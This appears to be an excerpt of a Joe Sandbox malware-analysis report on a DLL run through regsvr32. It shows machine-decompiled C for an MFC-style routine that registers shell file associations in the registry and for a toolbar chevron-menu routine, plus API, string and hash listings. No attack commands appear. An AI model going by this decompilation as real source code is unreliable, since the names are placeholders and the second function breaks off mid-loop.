Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: ClipboardFormatRegister
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1228543026-2889995556
Opcode ID: b863bfad9a6418f9e2fd1412faae52298b95b30eeefb4627becfeae85f7cd8de
Instruction ID: d6250aa12c54189e2aaf52096f9617c6b42460172e35f872c6075af019b10c62
Opcode Fuzzy Hash: b863bfad9a6418f9e2fd1412faae52298b95b30eeefb4627becfeae85f7cd8de
Instruction Fuzzy Hash: 100135718007D4AACB30EF769D1888BBAE4EED53103524D3BF29997650E7749C41DF84

Uniqueness

Uniqueness Score: -1.00%

Function 100281CE Relevance: 35.4, APIs: 4, Strings: 16, Instructions: 405
windowregistryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E100281CE(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t154;
				void* _t175;
				intOrPtr _t188;
				intOrPtr _t191;
				intOrPtr _t201;
				char* _t204;
				intOrPtr _t209;
				intOrPtr _t213;
				intOrPtr _t214;
				intOrPtr _t217;
				intOrPtr _t220;
				intOrPtr _t228;
				intOrPtr _t231;
				intOrPtr _t234;
				intOrPtr _t239;
				void* _t250;
				intOrPtr _t257;
				intOrPtr _t258;
				void* _t286;
				void* _t287;
				void* _t304;
				long _t337;
				intOrPtr _t338;
				char* _t339;
				void* _t340;
				void* _t342;
				intOrPtr _t343;
				intOrPtr _t344;
				char* _t345;
				struct HICON__* _t346;
				void* _t348;
				void* _t349;
				void* _t350;
				intOrPtr _t352;

				_t350 = __eflags;
				_t335 = __edx;
				_push(0x3c);
				E1004764D(0x1008fd53, __ebx, __edi, __esi);
				_t342 = __ecx;
				L1000140B(_t348 - 0x2c, E100184C0());
				 *(_t348 - 4) =  *(_t348 - 4) & 0x00000000;
				L1000140B(_t348 - 0x14, E100184C0());
				 *(_t348 - 4) = 1;
				E10029AB3(__ebx, __edx,  *((intOrPtr*)(E1001E302(__ebx, __edi, __ecx, _t350) + 8)), _t348 - 0x2c);
				_t154 =  *((intOrPtr*)(_t342 + 8));
				 *((intOrPtr*)(_t348 - 0x3c)) = _t154;
				 *(_t348 - 0x30) = 1;
				if(_t154 == 0) {
					L45:
					L100013E3( *((intOrPtr*)(_t348 - 0x14)) + 0xfffffff0, _t335);
					return E10047725(L100013E3( &(( *(_t348 - 0x2c))[0xfffffffffffffff0]), _t335));
				} else {
					_t343 = _t342 + 4;
					_t352 = _t343;
					 *((intOrPtr*)(_t348 - 0x40)) = _t343;
					do {
						_t337 =  *(E10012115(_t348 - 0x3c));
						 *(_t348 - 0x44) = _t337;
						L100010F5(_t348 - 0x24, _t352, _t348 - 0x2c);
						 *(_t348 - 4) = 2;
						L100010F5(_t348 - 0x28, _t352, _t348 - 0x2c);
						 *(_t348 - 4) = 3;
						L100010F5(_t348 - 0x20, _t352, _t348 - 0x2c);
						 *(_t348 - 4) = 4;
						L100010F5(_t348 - 0x38, _t352, _t348 - 0x2c);
						_t257 =  *((intOrPtr*)(_t348 + 8));
						_t353 = _t257;
						 *(_t348 - 4) = 5;
						if(_t257 != 0) {
							L1000140B(_t348 - 0x34, E100184C0());
							_t345 =  *(_t348 - 0x2c);
							 *(_t348 - 4) = 6;
							_t346 = ExtractIconA( *(E1001E302(_t257, _t337, _t345, _t353) + 8), _t345,  *(_t348 - 0x30));
							_t250 = _t348 - 0x34;
							if(_t346 == 0) {
								L1000106E(_t250, ",%d", 0);
								_t349 = _t349 + 0xc;
							} else {
								L1000106E(_t250, ",%d",  *(_t348 - 0x30));
								_t349 = _t349 + 0xc;
								DestroyIcon(_t346);
							}
							L1000AFA8(_t348 - 0x38,  *((intOrPtr*)(_t348 - 0x34)),  *((intOrPtr*)( *((intOrPtr*)(_t348 - 0x34)) - 0xc)));
							 *(_t348 - 4) = 5;
							L100013E3( *((intOrPtr*)(_t348 - 0x34)) - 0x10, _t335);
						}
						L1000140B(_t348 - 0x18, E100184C0());
						 *(_t348 - 4) = 7;
						L1000140B(_t348 - 0x10, E100184C0());
						 *(_t348 - 4) = 8;
						L1000140B(_t348 - 0x1c, E100184C0());
						 *(_t348 - 4) = 9;
						_t175 =  *((intOrPtr*)( *_t337 + 0x64))(_t348 - 0x10, 5);
						_t344 =  *((intOrPtr*)(_t348 - 0x38));
						if(_t175 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t348 - 0x10)) - 0xc)) == 0) {
							_t338 =  *((intOrPtr*)(_t348 - 0x24));
							_t258 =  *((intOrPtr*)(_t348 - 0x28));
							goto L42;
						} else {
							_push(6);
							_push(_t348 - 0x1c);
							if( *((intOrPtr*)( *_t337 + 0x64))() == 0) {
								L10018A1F(_t257, _t348 - 0x1c, _t348, _t348 - 0x10);
							}
							if(E10027494( *((intOrPtr*)(_t348 - 0x10)),  *((intOrPtr*)(_t348 - 0x1c)), 0) != 0) {
								__eflags = _t257;
								if(_t257 == 0) {
									L17:
									_t188 =  *((intOrPtr*)( *_t337 + 0x64))(_t348 - 0x14, 0);
									__eflags = _t188;
									if(_t188 == 0) {
										L22:
										_t339 = "ddeexec";
										_push(_t339);
										L1000106E(_t348 - 0x14, "%s\\shell\\open\\%s",  *((intOrPtr*)(_t348 - 0x10)));
										_t349 = _t349 + 0x10;
										_t191 = E10027494( *((intOrPtr*)(_t348 - 0x14)), "[open(\"%1\")]", 0);
										__eflags = _t191;
										if(_t191 == 0) {
											L16:
											L100013E3( *((intOrPtr*)(_t348 - 0x1c)) + 0xfffffff0, _t335);
											L100013E3( *((intOrPtr*)(_t348 - 0x10)) + 0xfffffff0, _t335);
											L100013E3( &(( *(_t348 - 0x18))[0xfffffffffffffff0]), _t335);
											_t298 = _t344 - 0x10;
											goto L13;
										}
										__eflags = _t257;
										if(_t257 == 0) {
											_push(" \"%1\"");
											_t304 = _t348 - 0x24;
											L28:
											E1000B029(_t304);
											L29:
											_push("command");
											L1000106E(_t348 - 0x14, "%s\\shell\\open\\%s",  *((intOrPtr*)(_t348 - 0x10)));
											_t338 =  *((intOrPtr*)(_t348 - 0x24));
											_t349 = _t349 + 0x10;
											_t201 = E10027494( *((intOrPtr*)(_t348 - 0x14)), _t338, 0);
											__eflags = _t201;
											if(_t201 != 0) {
												__eflags = _t257;
												_t258 =  *((intOrPtr*)(_t348 - 0x28));
												if(_t257 == 0) {
													L34:
													_t335 = _t348 - 0x18;
													 *((intOrPtr*)( *( *(_t348 - 0x44)) + 0x64))(_t348 - 0x18, 4);
													_t204 =  *(_t348 - 0x18);
													__eflags =  *((intOrPtr*)(_t204 - 0xc));
													if( *((intOrPtr*)(_t204 - 0xc)) == 0) {
														L42:
														L100013E3( *((intOrPtr*)(_t348 - 0x1c)) + 0xfffffff0, _t335);
														L100013E3( *((intOrPtr*)(_t348 - 0x10)) + 0xfffffff0, _t335);
														L100013E3( &(( *(_t348 - 0x18))[0xfffffffffffffff0]), _t335);
														L100013E3(_t344 - 0x10, _t335);
														__eflags =  *((intOrPtr*)(_t348 - 0x20)) + 0xfffffff0;
														L100013E3( *((intOrPtr*)(_t348 - 0x20)) + 0xfffffff0, _t335);
														_t286 = _t258 - 0x10;
														L43:
														L100013E3(_t286, _t335);
														_t287 = _t338 - 0x10;
														goto L44;
													}
													 *(_t348 - 0x44) = 0x208;
													 *((intOrPtr*)(_t348 - 0x48)) = RegQueryValueA(0x80000000,  *(_t348 - 0x18), L100011F4(_t348 - 0x14, 0x208), _t348 - 0x44);
													E1000FED3(_t348 - 0x14, 0xffffffff);
													__eflags =  *((intOrPtr*)(_t348 - 0x48));
													if( *((intOrPtr*)(_t348 - 0x48)) != 0) {
														L38:
														_t209 = E10027494( *(_t348 - 0x18),  *((intOrPtr*)(_t348 - 0x10)), 0);
														__eflags = _t209;
														if(_t209 != 0) {
															__eflags =  *((intOrPtr*)(_t348 + 8));
															if( *((intOrPtr*)(_t348 + 8)) != 0) {
																L1000106E(_t348 - 0x14, "%s\\ShellNew",  *(_t348 - 0x18));
																_t349 = _t349 + 0xc;
																E10027494( *((intOrPtr*)(_t348 - 0x14)), 0x1009d925, "NullFile");
															}
														}
														goto L42;
													}
													_t213 =  *((intOrPtr*)(_t348 - 0x14));
													__eflags =  *((intOrPtr*)(_t213 - 0xc));
													if( *((intOrPtr*)(_t213 - 0xc)) == 0) {
														goto L38;
													}
													_t214 = E1001BBE2(_t258, _t348 - 0x14, _t335, _t338, _t344, _t348,  *((intOrPtr*)(_t348 - 0x10)));
													__eflags = _t214;
													if(_t214 != 0) {
														goto L42;
													}
													goto L38;
												}
												_push("command");
												L1000106E(_t348 - 0x14, "%s\\shell\\print\\%s",  *((intOrPtr*)(_t348 - 0x10)));
												_t349 = _t349 + 0x10;
												_t217 = E10027494( *((intOrPtr*)(_t348 - 0x14)), _t258, 0);
												__eflags = _t217;
												if(_t217 == 0) {
													goto L42;
												}
												_push("command");
												L1000106E(_t348 - 0x14, "%s\\shell\\printto\\%s",  *((intOrPtr*)(_t348 - 0x10)));
												_t349 = _t349 + 0x10;
												_t220 = E10027494( *((intOrPtr*)(_t348 - 0x14)),  *((intOrPtr*)(_t348 - 0x20)), 0);
												__eflags = _t220;
												if(_t220 == 0) {
													goto L42;
												}
												goto L34;
											}
											L100013E3( *((intOrPtr*)(_t348 - 0x1c)) + 0xfffffff0, _t335);
											L100013E3( *((intOrPtr*)(_t348 - 0x10)) + 0xfffffff0, _t335);
											L100013E3( &(( *(_t348 - 0x18))[0xfffffffffffffff0]), _t335);
											L100013E3(_t344 - 0x10, _t335);
											L100013E3( *((intOrPtr*)(_t348 - 0x20)) + 0xfffffff0, _t335);
											_t286 =  *((intOrPtr*)(_t348 - 0x28)) + 0xfffffff0;
											goto L43;
										}
										_push(_t339);
										L1000106E(_t348 - 0x14, "%s\\shell\\print\\%s",  *((intOrPtr*)(_t348 - 0x10)));
										_t349 = _t349 + 0x10;
										_t228 = E10027494( *((intOrPtr*)(_t348 - 0x14)), "[print(\"%1\")]", 0);
										__eflags = _t228;
										if(_t228 == 0) {
											goto L16;
										}
										_push(_t339);
										L1000106E(_t348 - 0x14, "%s\\shell\\printto\\%s",  *((intOrPtr*)(_t348 - 0x10)));
										_t349 = _t349 + 0x10;
										_t231 = E10027494( *((intOrPtr*)(_t348 - 0x14)), "[printto(\"%1\",\"%2\",\"%3\",\"%4\")]", 0);
										__eflags = _t231;
										if(_t231 == 0) {
											goto L16;
										}
										_t340 = " /dde";
										E1000B029(_t348 - 0x24, _t340);
										E1000B029(_t348 - 0x28, _t340);
										_push(_t340);
										L21:
										_t304 = _t348 - 0x20;
										goto L28;
									}
									_t234 =  *((intOrPtr*)(_t348 - 0x14));
									__eflags =  *((intOrPtr*)(_t234 - 0xc));
									if( *((intOrPtr*)(_t234 - 0xc)) == 0) {
										goto L22;
									}
									E1000B029(_t348 - 0x24, " \"%1\"");
									__eflags = _t257;
									if(_t257 == 0) {
										goto L29;
									}
									E1000B029(_t348 - 0x28, " /p \"%1\"");
									_push(" /pt \"%1\" \"%2\" \"%3\" \"%4\"");
									goto L21;
								}
								L1000106E(_t348 - 0x14, "%s\\DefaultIcon",  *((intOrPtr*)(_t348 - 0x10)));
								_t349 = _t349 + 0xc;
								_t239 = E10027494( *((intOrPtr*)(_t348 - 0x14)), _t344, 0);
								__eflags = _t239;
								if(_t239 != 0) {
									goto L17;
								}
								goto L16;
							} else {
								L100013E3( *((intOrPtr*)(_t348 - 0x1c)) + 0xfffffff0, _t335);
								L100013E3( *((intOrPtr*)(_t348 - 0x10)) + 0xfffffff0, _t335);
								L100013E3( &(( *(_t348 - 0x18))[0xfffffffffffffff0]), _t335);
								_t298 =  *((intOrPtr*)(_t348 - 0x38)) + 0xfffffff0;
								L13:
								L100013E3(_t298, _t335);
								L100013E3( *((intOrPtr*)(_t348 - 0x20)) + 0xfffffff0, _t335);
								L100013E3( *((intOrPtr*)(_t348 - 0x28)) + 0xfffffff0, _t335);
								_t287 =  *((intOrPtr*)(_t348 - 0x24)) + 0xfffffff0;
								goto L44;
							}
						}
						L44:
						 *(_t348 - 4) = 1;
						L100013E3(_t287, _t335);
						 *(_t348 - 0x30) =  *(_t348 - 0x30) + 1;
					} while ( *((intOrPtr*)(_t348 - 0x3c)) != 0);
					goto L45;
				}
			}

0x100281ce
0x100281ce
0x100281ce
0x100281d5
0x100281da
0x100281e5
0x100281ea
0x100281f7
0x100281fc
0x1002820d
0x10028212
0x10028217
0x1002821a
0x10028221
0x100286ed
0x100286f3
0x10028708
0x10028227
0x10028227
0x10028227
0x1002822a
0x1002822d
0x10028239
0x10028242
0x10028245
0x10028251
0x10028255
0x10028261
0x10028265
0x10028271
0x10028275
0x1002827a
0x1002827d
0x1002827f
0x10028283
0x1002828e
0x10028293
0x10028296
0x100282ad
0x100282b1
0x100282b4
0x100282d8
0x100282dd
0x100282b6
0x100282bf
0x100282c4
0x100282c8
0x100282c8
0x100282ea
0x100282f2
0x100282f6
0x100282f6
0x10028304
0x10028309
0x10028316
0x1002831b
0x10028328
0x10028337
0x1002833b
0x10028340
0x10028343
0x10028692
0x10028695
0x00000000
0x10028356
0x10028358
0x1002835d
0x10028365
0x1002836e
0x1002836e
0x10028382
0x100283d1
0x100283d3
0x1002841e
0x10028428
0x1002842b
0x1002842d
0x10028467
0x10028467
0x1002846c
0x10028479
0x1002847e
0x1002848b
0x10028490
0x10028492
0x100283f8
0x100283fe
0x10028409
0x10028414
0x10028419
0x00000000
0x10028419
0x10028498
0x1002849a
0x10028511
0x10028516
0x10028519
0x10028519
0x1002851e
0x1002851e
0x1002852f
0x10028534
0x10028537
0x10028540
0x10028545
0x10028547
0x10028588
0x1002858a
0x1002858d
0x100285e9
0x100285f0
0x100285f4
0x100285f7
0x100285fa
0x100285fe
0x10028698
0x1002869e
0x100286a9
0x100286b4
0x100286bc
0x100286c4
0x100286c7
0x100286cc
0x100286cf
0x100286cf
0x100286d4
0x00000000
0x100286d4
0x1002860d
0x1002862d
0x10028630
0x10028635
0x10028639
0x10028653
0x1002865b
0x10028660
0x10028662
0x10028664
0x10028668
0x10028676
0x1002867b
0x1002868b
0x1002868b
0x10028668
0x00000000
0x10028662
0x1002863b
0x1002863e
0x10028642
0x00000000
0x00000000
0x1002864a
0x1002864f
0x10028651
0x00000000
0x00000000
0x00000000
0x10028651
0x1002858f
0x100285a0
0x100285a5
0x100285ae
0x100285b3
0x100285b5
0x00000000
0x00000000
0x100285bb
0x100285cc
0x100285d1
0x100285dc
0x100285e1
0x100285e3
0x00000000
0x00000000
0x00000000
0x100285e3
0x1002854f
0x1002855a
0x10028565
0x1002856d
0x10028578
0x10028580
0x00000000
0x10028580
0x1002849c
0x100284a9
0x100284ae
0x100284bb
0x100284c0
0x100284c2
0x00000000
0x00000000
0x100284c8
0x100284d5
0x100284da
0x100284e7
0x100284ec
0x100284ee
0x00000000
0x00000000
0x100284f4
0x100284fd
0x10028506
0x1002850b
0x1002845f
0x1002845f
0x00000000
0x1002845f
0x1002842f
0x10028432
0x10028436
0x00000000
0x00000000
0x10028440
0x10028445
0x10028447
0x00000000
0x00000000
0x10028455
0x1002845a
0x00000000
0x1002845a
0x100283e1
0x100283e6
0x100283ef
0x100283f4
0x100283f6
0x00000000
0x00000000
0x00000000
0x10028384
0x1002838a
0x10028395
0x100283a0
0x100283a8
0x100283ab
0x100283ab
0x100283b6
0x100283c1
0x100283c9
0x00000000
0x100283c9
0x10028382
0x100286d7
0x100286d7
0x100286db
0x100286e0
0x100286e3
0x00000000
0x1002822d

APIs

__EH_prolog3.LIBCMT ref: 100281D5

Part of subcall function 10029AB3: GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10029ADC
Part of subcall function 10029AB3: GetShortPathNameA.KERNEL32 ref: 10029AF3

ExtractIconA.SHELL32(?,?,00000001), ref: 100282A7
DestroyIcon.USER32(00000000), ref: 100282C8

Part of subcall function 10027494: lstrlenA.KERNEL32(?), ref: 100274A0
Part of subcall function 10027494: RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 100274B4

RegQueryValueA.ADVAPI32(80000000,?,00000000,?), ref: 10028622

Part of subcall function 10027494: RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 100274CE
Part of subcall function 10027494: lstrlenA.KERNEL32(?), ref: 100274DB
Part of subcall function 10027494: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 100274F0
Part of subcall function 10027494: RegCloseKey.ADVAPI32(?), ref: 100274FB

Strings

command, xrefs: 1002851E, 1002858F, 100285BB
ddeexec, xrefs: 10028467, 1002846C, 1002849C, 100284C8
[printto("%1","%2","%3","%4")], xrefs: 100284DF
%s\shell\printto\%s, xrefs: 100284CF, 100285C6
,%d, xrefs: 100282B9, 100282D2
%s\shell\print\%s, xrefs: 100284A3, 1002859A
"%1", xrefs: 10028438, 10028511
/dde, xrefs: 100284F4, 100284F9, 10028502, 1002850B
/p "%1", xrefs: 1002844D
%s\shell\open\%s, xrefs: 10028473, 10028529
%s\ShellNew, xrefs: 10028670
[open("%1")], xrefs: 10028483
[print("%1")], xrefs: 100284B3
%s\DefaultIcon, xrefs: 100283DB
/pt "%1" "%2" "%3" "%4", xrefs: 1002845A
NullFile, xrefs: 1002867E

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Value$IconNamelstrlen$CloseCreateDestroyExtractFileH_prolog3ModulePathQueryShort
String ID: "%1"$ /dde$ /p "%1"$ /pt "%1" "%2" "%3" "%4"$%s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$%s\shell\printto\%s$,%d$NullFile$[open("%1")]$[print("%1")]$[printto("%1","%2","%3","%4")]$command$ddeexec
API String ID: 4251081318-4043335175
Opcode ID: 4c32ff4bc902e0c98f2780655bd273f9fef7291b1b55e839649e5e4854e4e306
Instruction ID: cc2a2a3f3ee0db5eddfe98f37bb65f156932ebb08ca72f69f933ffad2634399a
Opcode Fuzzy Hash: 4c32ff4bc902e0c98f2780655bd273f9fef7291b1b55e839649e5e4854e4e306
Instruction Fuzzy Hash: 44F15839D0020AABEB04EBE4CC96BEEB7B4EF04354F500118F625772D6DB70AA45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 10037781 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 410
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E10037781(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				CHAR* _t151;
				void* _t159;
				signed int _t195;
				signed int _t232;
				signed int _t246;
				signed int _t247;
				signed int _t256;
				signed int _t257;
				int _t267;
				signed int _t269;
				signed int _t318;
				void* _t336;
				int _t341;
				signed int _t342;
				int _t346;
				struct HWND__** _t347;
				signed int _t348;
				RECT* _t350;
				int _t351;
				struct tagMENUITEMINFOA _t352;
				int _t353;
				intOrPtr _t354;
				void* _t358;
				void* _t364;

				_t364 = __eflags;
				_t336 = __edx;
				_push(0xf4);
				E1004764D(0x10090c41, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t358 + 0x60)) = __ecx;
				L1000140B(_t358 + 0x64, E100184C0());
				_t338 = lstrlenA;
				 *(_t358 - 4) =  *(_t358 - 4) & 0x00000000;
				_t265 = "ReBarWindow32";
				_t346 = lstrlenA("ReBarWindow32") + 1;
				_t151 = L100011F4(_t358 + 0x64, _t346);
				_t347 =  *(_t358 + 0x74);
				GetClassNameA( *_t347, _t151, _t346);
				E1000FED3(_t358 + 0x64, 0xffffffff);
				 *(_t358 + 0x74) = E10014011(_t358 + 0x64, lstrlenA, _t347, _t364,  *_t347);
				if(E1001BBE2("ReBarWindow32", _t358 + 0x64, _t336, lstrlenA, _t347, _t358, _t265) != 0) {
					L33:
					_t348 = 0;
					L6:
					L100013E3( *((intOrPtr*)(_t358 + 0x64)) + 0xfffffff0, _t336);
					 *[fs:0x0] =  *((intOrPtr*)(_t358 - 0xc));
					return _t348;
				}
				_t267 =  *(_t358 + 0x74);
				if(_t267 == 0 || E100203AA(_t267, 0x1009f7c8) == 0) {
					goto L33;
				} else {
					_t159 = L10014B68(_t267);
					if(_t159 == 0) {
						L7:
						E1001E619(_t267, _t358, _t338, _t347, __eflags);
						 *(_t358 - 4) = 1;
						L1000140B(_t358 + 0x70, E100184C0());
						 *(_t358 - 4) = 2;
						L1000140B(_t358 + 0x5c, E100184C0());
						 *(_t358 - 4) = 3;
						E1000C4AC(_t358 + 0x28);
						_push( *((intOrPtr*)(_t358 + 0x60)));
						 *(_t358 - 4) = 4;
						L1000CD6F(_t267, _t358 - 0x30, _t338, _t347, __eflags);
						_t268 = SendMessageA;
						 *(_t358 - 4) = 5;
						 *(_t358 - 0x100) = 0x50;
						 *((intOrPtr*)(_t358 - 0xfc)) = 0x10;
						SendMessageA( *(_t267 + 0x20), 0x41d, _t347[3], _t358 - 0x100);
						_t34 =  *(_t358 + 0x74) + 0x20; // 0x100ad5f0
						SendMessageA( *_t34, 0x409, _t347[3], _t358 - 0x1c);
						_t341 = lstrlenA("ToolbarWindow32") + 1;
						GetClassNameA( *(_t358 - 0xe0), L100011F4(_t358 + 0x64, _t341), _t341);
						E1000FED3(_t358 + 0x64, 0xffffffff);
						_t342 = E10014011(_t358 + 0x64, _t341, _t347, __eflags,  *(_t358 - 0xe0));
						 *(_t358 + 0x20) = _t342;
						__eflags = E1001BBE2(SendMessageA, _t358 + 0x64, _t336, _t342, _t347, _t358, "ToolbarWindow32");
						if(__eflags != 0) {
							L32:
							 *(_t358 - 4) = 4;
							L1000CDC3(_t268, _t358 - 0x30, _t342, _t347, __eflags);
							 *(_t358 - 4) = 3;
							L1000CD56(_t358 + 0x28);
							L100013E3( *((intOrPtr*)(_t358 + 0x5c)) + 0xfffffff0, _t336);
							__eflags =  *((intOrPtr*)(_t358 + 0x70)) + 0xfffffff0;
							L100013E3( *((intOrPtr*)(_t358 + 0x70)) + 0xfffffff0, _t336);
							 *(_t358 - 4) = 0;
							E1001E680(_t268, _t358, _t342, _t347, __eflags);
							goto L33;
						}
						__eflags = _t342;
						if(__eflags == 0) {
							goto L32;
						}
						__eflags = E100203AA(_t342, 0x1009f474);
						if(__eflags == 0) {
							goto L32;
						}
						_t350 =  &(_t347[6]);
						__eflags = _t350;
						 *(_t358 - 0x14) = _t350->left;
						 *(_t358 + 0x24) = _t350;
						L1000C931( *(_t358 + 0x74), _t358 - 0x1c);
						L1000C8F5(_t342, _t358 - 0x1c);
						_t351 = E100353F2(_t342);
						 *(_t358 + 0x58) = _t351;
						while(1) {
							_t351 = _t351 - 1;
							 *(_t358 + 0x74) = _t351;
							SendMessageA( *(_t342 + 0x20), 0x41d, _t351, _t358 - 0x80);
							_t195 = IntersectRect(_t358 - 0x90, _t358 - 0x1c, _t358 - 0x80);
							__eflags = _t195;
							if(_t195 != 0) {
								break;
							}
							__eflags = _t351;
							if(_t351 > 0) {
								continue;
							}
							break;
						}
						_t352 = 0x30;
						E10049170(_t342, _t358 - 0x70, 0, _t352);
						 *(_t358 - 0x70) = _t352;
						_t343 = E1003541E(_t342);
						E1003C2E3(_t358 + 0x3c);
						 *((intOrPtr*)(_t358 + 0x3c)) = 0x1009e49c;
						_t353 =  *(_t358 + 0x74);
						 *(_t358 - 4) = 6;
						E1003C30A(_t358 + 0x3c,  *(_t358 + 0x58) - _t353, 0xffffffff);
						E1001E54F(_t358, _t198, _t358, CreatePopupMenu());
						E1000D064(_t358 + 0x28, _t358 - 0x30);
						_t269 = 0;
						__eflags = _t353 -  *(_t358 + 0x58);
						if(__eflags >= 0) {
							L27:
							CopyRect(_t358 - 0x40,  *(_t358 + 0x24));
							L1000C931( *((intOrPtr*)(_t358 + 0x60)), _t358 - 0x40);
							_t354 = 0;
							L10012A40(_t358, __eflags, 0,  *(_t358 - 0x40),  *((intOrPtr*)(_t358 - 0x34)),  *((intOrPtr*)(_t358 + 0x60)), 0);
							__eflags = _t269;
							 *((intOrPtr*)( *((intOrPtr*)(_t358 + 0x78)))) = 0;
							if(__eflags <= 0) {
								L31:
								 *(_t358 - 4) = 5;
								E1003C2FA(_t358 + 0x3c);
								 *(_t358 - 4) = 4;
								L1000CDC3(_t269, _t358 - 0x30, _t343, _t354, __eflags);
								 *(_t358 - 4) = 3;
								L1000CD56(_t358 + 0x28);
								L100013E3( *((intOrPtr*)(_t358 + 0x5c)) + 0xfffffff0, _t336);
								L100013E3( *((intOrPtr*)(_t358 + 0x70)) + 0xfffffff0, _t336);
								 *(_t358 - 4) = 0;
								E1001E680(_t269, _t358, _t343, _t354, __eflags);
								_t348 = 1;
								goto L6;
							} else {
								goto L28;
							}
							do {
								L28:
								_t318 =  *(E1003524D(_t358 + 0x3c, _t354));
								__eflags = _t318;
								if(_t318 != 0) {
									 *((intOrPtr*)( *_t318 + 4))(1);
								}
								_t354 = _t354 + 1;
								__eflags = _t354 - _t269;
							} while (__eflags < 0);
							goto L31;
						} else {
							goto L14;
						}
						do {
							L14:
							E1003E06B( *(_t358 + 0x20), _t336, __eflags,  *(_t358 + 0x74), _t358 + 0x54, _t358 + 0x38, _t358 + 0x50);
							__eflags =  *(_t358 + 0x38) & 0x00000001;
							if(( *(_t358 + 0x38) & 0x00000001) != 0) {
								__eflags = _t269;
								if(_t269 == 0) {
									goto L26;
								}
								 *((intOrPtr*)(_t358 - 0x6c)) = 0x100;
								 *((intOrPtr*)(_t358 - 0x68)) = 0x800;
								L25:
								InsertMenuItemA( *(_t358 + 4),  *(_t358 + 0x74), 1, _t358 - 0x70);
								goto L26;
							}
							 *((intOrPtr*)(_t358 - 0x6c)) = 0x162;
							L10001276(_t358 + 0x70,  *((intOrPtr*)(_t358 + 0x54)));
							E1001FB1B(_t358 + 0x5c,  *((intOrPtr*)(_t358 + 0x70)), 1, 0xa);
							_t232 = E10009F14(__eflags, 8);
							__eflags = _t232;
							if(_t232 == 0) {
								_t232 = 0;
								__eflags = 0;
							} else {
								 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
								 *_t232 = 0x10098d24;
							}
							E1003C4E9(_t269, _t358 + 0x3c, _t358, _t269, _t232);
							L10036D80(_t358 + 0x3c,  *((intOrPtr*)(_t343 + 4)),  *((intOrPtr*)(_t358 + 0x50)), _t358 - 0xb0);
							CopyRect(_t358 + 0x10, _t358 - 0xa0);
							OffsetRect(_t358 + 0x10,  ~( *(_t358 + 0x10)),  ~( *(_t358 + 0x14)));
							E10035296( *(E1003524D(_t358 + 0x3c, _t269)), _t358 - 0x30,  *((intOrPtr*)(_t358 + 0x18)),  *((intOrPtr*)(_t358 + 0x1c)));
							_t246 =  *(E1003524D(_t358 + 0x3c, _t269));
							__eflags = _t246;
							if(_t246 != 0) {
								_t246 =  *(_t246 + 4);
							}
							_t247 = E1000D0A1( *((intOrPtr*)(_t358 + 0x2c)), _t246);
							 *(E1003524D(_t358 + 0x3c, _t269)) = _t247;
							E1001FBA9(_t358 + 0x28, _t358 + 0x10, GetSysColor(4));
							L10036D9E(_t343, _t358 + 0x28,  *((intOrPtr*)(_t358 + 0x50)), 0, 0, 1);
							_t256 =  *(E1003524D(_t358 + 0x3c, _t269));
							__eflags = _t256;
							if(_t256 != 0) {
								_t256 =  *(_t256 + 4);
							}
							_t257 = E1000D0A1( *((intOrPtr*)(_t358 + 0x2c)), _t256);
							 *(E1003524D(_t358 + 0x3c, _t269)) = _t257;
							 *((intOrPtr*)(_t358 - 0x4c)) =  *((intOrPtr*)(_t358 + 0x5c));
							 *((intOrPtr*)(_t358 - 0x60)) =  *((intOrPtr*)(_t358 + 0x54));
							 *((intOrPtr*)(_t358 - 0x68)) = 0x100;
							 *(_t358 - 0x50) =  *(E1003524D(_t358 + 0x3c, _t269));
							_t269 = _t269 + 1;
							goto L25;
							L26:
